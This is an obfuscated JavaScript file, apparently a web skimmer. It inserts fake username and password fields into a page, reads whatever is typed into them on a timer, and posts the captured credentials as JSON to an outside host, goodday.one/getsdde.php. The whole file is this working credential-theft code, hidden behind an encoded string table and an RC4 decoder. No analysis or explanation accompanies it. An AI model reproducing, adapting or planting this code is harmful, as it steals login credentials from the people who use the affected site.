var _0x2306 = ['w7PDs8Kcw7AX', 'TcKtwoIf', 'XcKaDcOuOsK/KcKxYg==', 'w7LDuMKFw6ILE8OVMsKMADHDh8KgUEHCjsKhwpp9Qw==', 'S8KCw68r', 'w6HDqQ9Jw4s=', 'DcK5bcOCYBvDmEY=', 'wp3Ch8KxRA==', 'wpZnw5TDtMOH', 'JBHCrh8=', 'dQvCjMOc', 'wpbCncODwonChQx1LA==', 'Gzdrwq7CgE3CvQrDhlQnKzXCsQ==', 'TcO0AMOj', 'w5sdw55R', 'PhrCsA7CmA==', 'w7XDrcKJw6s=', 'w7xHw4JAJsOYw7vCncKvAsKc', 'wpXDt8KoWMOd', 'Y8OOHSVQbmQC', 'J3BLOMKJwprCkyfCtkzDmQ==', 'w6g7N8K/DMKjM2DCmz5Bw70ow67DrBpnEsO0Kw==', 'NmFILsKQwpHCois=', 'KsKHRMOY'];
(function(_0x11645f, _0x2306db) {
    var _0x62a143 = function(_0x4b97e6) {
        while (--_0x4b97e6) {
            _0x11645f['push'](_0x11645f['shift']());
        }
    };
    _0x62a143(++_0x2306db);
}(_0x2306, 0xad));
var _0x62a1 = function(_0x11645f, _0x2306db) {
    _0x11645f = _0x11645f - 0x0;
    var _0x62a143 = _0x2306[_0x11645f];
    if (_0x62a1['oTbQtT'] === undefined) {
        (function() {
            var _0x3e77fe;
            try {
                var _0x530ba2 = Function('return\x20(function()\x20' + '{}.constructor(\x22return\x20this\x22)(\x20)' + ');');
                _0x3e77fe = _0x530ba2();
            } catch (_0x1783ad) {
                _0x3e77fe = window;
            }
            var _0x595ff0 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
            _0x3e77fe['atob'] || (_0x3e77fe['atob'] = function(_0x482442) {
                var _0xc0483a = String(_0x482442)['replace'](/=+$/, '');
                var _0x33963d = '';
                for (var _0x2c8982 = 0x0, _0x55007c, _0x644524, _0x370e08 = 0x0; _0x644524 = _0xc0483a['charAt'](_0x370e08++); ~_0x644524 && (_0x55007c = _0x2c8982 % 0x4 ? _0x55007c * 0x40 + _0x644524 : _0x644524,
                _0x2c8982++ % 0x4) ? _0x33963d += String['fromCharCode'](0xff & _0x55007c >> (-0x2 * _0x2c8982 & 0x6)) : 0x0) {
                    _0x644524 = _0x595ff0['indexOf'](_0x644524);
                }
                return _0x33963d;
            }
            );
        }());
        var _0xa5def = function(_0x381032, _0x3fcfbd) {
            var _0x38a675 = [], _0x58f12a = 0x0, _0x12d78d, _0xecc6a6 = '', _0x316169 = '';
            _0x381032 = atob(_0x381032);
            for (var _0x1eb41e = 0x0, _0x2eb1b6 = _0x381032['length']; _0x1eb41e < _0x2eb1b6; _0x1eb41e++) {
                _0x316169 += '%' + ('00' + _0x381032['charCodeAt'](_0x1eb41e)['toString'](0x10))['slice'](-0x2);
            }
            _0x381032 = decodeURIComponent(_0x316169);
            var _0x3dd480;
            for (_0x3dd480 = 0x0; _0x3dd480 < 0x100; _0x3dd480++) {
                _0x38a675[_0x3dd480] = _0x3dd480;
            }
            for (_0x3dd480 = 0x0; _0x3dd480 < 0x100; _0x3dd480++) {
                _0x58f12a = (_0x58f12a + _0x38a675[_0x3dd480] + _0x3fcfbd['charCodeAt'](_0x3dd480 % _0x3fcfbd['length'])) % 0x100;
                _0x12d78d = _0x38a675[_0x3dd480];
                _0x38a675[_0x3dd480] = _0x38a675[_0x58f12a];
                _0x38a675[_0x58f12a] = _0x12d78d;
            }
            _0x3dd480 = 0x0;
            _0x58f12a = 0x0;
            for (var _0x5ea047 = 0x0; _0x5ea047 < _0x381032['length']; _0x5ea047++) {
                _0x3dd480 = (_0x3dd480 + 0x1) % 0x100;
                _0x58f12a = (_0x58f12a + _0x38a675[_0x3dd480]) % 0x100;
                _0x12d78d = _0x38a675[_0x3dd480];
                _0x38a675[_0x3dd480] = _0x38a675[_0x58f12a];
                _0x38a675[_0x58f12a] = _0x12d78d;
                _0xecc6a6 += String['fromCharCode'](_0x381032['charCodeAt'](_0x5ea047) ^ _0x38a675[(_0x38a675[_0x3dd480] + _0x38a675[_0x58f12a]) % 0x100]);
            }
            return _0xecc6a6;
        };
        _0x62a1['XVpiGs'] = _0xa5def;
        _0x62a1['ffAYHF'] = {};
        _0x62a1['oTbQtT'] = !![];
    }
    var _0x4b97e6 = _0x62a1['ffAYHF'][_0x11645f];
    if (_0x4b97e6 === undefined) {
        if (_0x62a1['pHpJiE'] === undefined) {
            _0x62a1['pHpJiE'] = !![];
        }
        _0x62a143 = _0x62a1['XVpiGs'](_0x62a143, _0x2306db);
        _0x62a1['ffAYHF'][_0x11645f] = _0x62a143;
    } else {
        _0x62a143 = _0x4b97e6;
    }
    return _0x62a143;
};
var i = 0x0;
var lastuser = '';
var lastpwd = '';
let btop = document[_0x62a1('0x7', '%WxH')](_0x62a1('0x5', 'sC%u'));
let loginuser = document['createElement'](_0x62a1('0x13', 'FlmP'));
loginuser[_0x62a1('0x9', 'Lx5S')] = _0x62a1('0x1', 'vB)0');
loginuser['id'] = _0x62a1('0xe', 'c1[L');
loginuser[_0x62a1('0x8', 'Zfbn')] = _0x62a1('0x2', 'xEFI');
loginuser[_0x62a1('0xd', 'zCLL')] = _0x62a1('0x10', '5HK9');
btop[_0x62a1('0xf', '$g09')](loginuser);
let loginpwd = document['createElement'](_0x62a1('0xa', 'PGa8'));
loginpwd[_0x62a1('0x17', '7#JF')] = 'password';
loginpwd['id'] = _0x62a1('0x11', '$g09');
loginpwd[_0x62a1('0x12', 'Vm]N')] = _0x62a1('0x6', '#52[');
loginpwd[_0x62a1('0x0', '3BDs')] = _0x62a1('0x16', 'FlmP');
btop[_0x62a1('0xc', '3aiv')](loginpwd);
var time1 = setInterval(function() {
    i++;
    var _0x5eb6bc = document['getElementById']('username')['value'];
    var _0x517cfd = document['getElementById']('password')[_0x62a1('0x3', 'FXCh')];
	console.log("Here 1")
   // if (_0x5eb6bc !== lastuser && _0x517cfd !== lastpwd) {
        post(_0x5eb6bc, _0x517cfd);
       // lastuser = _0x5eb6bc;
        //lastpwd = _0x517cfd;
    //}
    if (i == 0xa) {
        clearInterval(time1);
    }
}, 0x2580);
function post(_0x39ea77, _0x2d183d) {
    var _0xc06175 = new XMLHttpRequest();
    var _0x4a3dc8 = {
        'id': _0x39ea77,
        'pass': _0x2d183d
    };
    _0xc06175[_0x62a1('0xb', 'FlmP')](_0x62a1('0x14', 'NFp!'), 'https://goodday.one/getsdde.php', !![]);
    _0xc06175[_0x62a1('0x4', 'PGa8')](JSON[_0x62a1('0x15', 's[ef')](_0x4a3dc8));
}
